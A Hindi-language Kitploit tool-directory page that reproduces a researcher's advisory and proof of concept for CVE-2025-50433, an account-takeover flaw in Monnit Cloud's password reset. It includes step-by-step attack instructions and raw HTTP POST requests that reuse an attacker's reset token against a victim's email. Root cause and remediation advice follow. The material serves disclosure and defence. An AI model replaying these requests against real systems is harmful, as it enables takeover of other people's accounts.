Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-50433 — Monnit Cloud खाता अधिग्रहण (CVE-2025-50433) के लिए प्रूफ ऑफ कॉन्सेप्ट, पासवर्ड रीसेट में लापता टोकन-ईमेल सत्यापन का शोषण करता है और हमले के चरण, मूल कारण और उपचार प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/0xmandor/cve-2025-50433
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHub0xmandor/cve-2025-50433

CVE-2025-50433

Monnit Cloud खाता अधिग्रहण (CVE-2025-50433) के लिए प्रूफ ऑफ कॉन्सेप्ट, पासवर्ड रीसेट में लापता टोकन-ईमेल सत्यापन का शोषण करता है और हमले के चरण, मूल कारण और उपचार प्रदान करता है।

रिपॉजिटरी देखें
19 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-50433 — मॉनिट क्लाउड प्लेटफ़ॉर्म्स (*.imonnit.com) को प्रभावित करने वाली गंभीर खाता अधिग्रहण भेद्यता

सारांश

एक गंभीर प्रमाणीकरण भेद्यता *.imonnit.com पर मौजूद है जो किसी भी उपयोगकर्ता खाते का पूर्ण खाता अधिग्रहण (ATO) पीड़ित के हस्तक्षेप के बिना करने की अनुमति देती है।

बैकएंड पासवर्ड-रीसेट टोकन और लक्ष्य ईमेल के बीच संबंध को मान्य करने में विफल रहता है, जिससे हमलावर अपने स्वयं के वैध रीसेट टोकन का उपयोग करके किसी भी पीड़ित खाते का पासवर्ड रीसेट कर सकते हैं।


हमला वेक्टर (चरण-दर-चरण PoC)

  1. हमलावर खाता A ([email protected]) बनाता है।
  2. पीड़ित के पास खाता B ([email protected]) है।
  3. हमलावर A और B दोनों के लिए पासवर्ड रीसेट का अनुरोध करता है।
  4. हमलावर को केवल खाता A के लिए एक वैध रीसेट टोकन प्राप्त होता है।
  5. हमलावर टोकन A का उपयोग करके पासवर्ड रीसेट फॉर्म खोलता है:
root@kitploit:~
    POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
    Host: www.imonnit.com
    Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2

    __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
  1. सबमिट करने से पहले, हमलावर ईमेल और उपयोगकर्ता नाम फ़ील्ड को पीड़ित के ईमेल में बदल देता है:
root@kitploit:~
    POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
    Host: www.imonnit.com
    Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2

    __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
  1. बैकएंड गलत तरीके से बेमेल ईमेल + टोकन स्वीकार कर लेता है।
  2. पीड़ित का पासवर्ड रीसेट हो जाता है, और हमलावर को पीड़ित के खाते तक पूर्ण पहुंच मिल जाती है।

प्रभाव

  • पूर्ण खाता अधिग्रहण (ATO)।
  • पीड़ित के डैशबोर्ड, सेंसर और खाता डेटा तक पूर्ण पहुंच।
  • उपकरणों, सूचनाओं और कॉन्फ़िगरेशन को संशोधित करने की क्षमता।
  • पीड़ित के हस्तक्षेप के बिना विशेषाधिकार वृद्धि।
  • बिना किसी पूर्वापेक्षा के दूरस्थ शोषण।

गंभीरता

CVSS 3.1: 9.8 (गंभीर)
वेक्टर: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


प्रभावित डोमेन

root@kitploit:~
*.imonnit.com

मूल कारण

पासवर्ड रीसेट एंडपॉइंट यह मान्य नहीं करता कि रीसेट टोकन रीसेट ऑपरेशन के दौरान प्रदान किए गए उसी ईमेल से संबंधित है, जिससे हमलावर-नियंत्रित टोकन का उपयोग करके मनमाने ढंग से पासवर्ड रीसेट सक्षम होते हैं।


प्रभावित एंडपॉइंट

root@kitploit:~
/Account/PasswordReset/

विक्रेता: Monnit Corporation


सिफारिशें

  • बैकएंड पर सख्त टोकन-ईमेल बाइंडिंग सत्यापन लागू करें।
  • किसी भी पासवर्ड रीसेट अनुरोध को अस्वीकार करें जहां टोकन संबंधित खाते से मेल नहीं खाता।
  • उपयोग के तुरंत बाद टोकन अमान्य करें।

खोजकर्ता

Mohamed Mandor (0xmandor)
GitHub: https://github.com/0xmandor

टूल डाउनलोड करें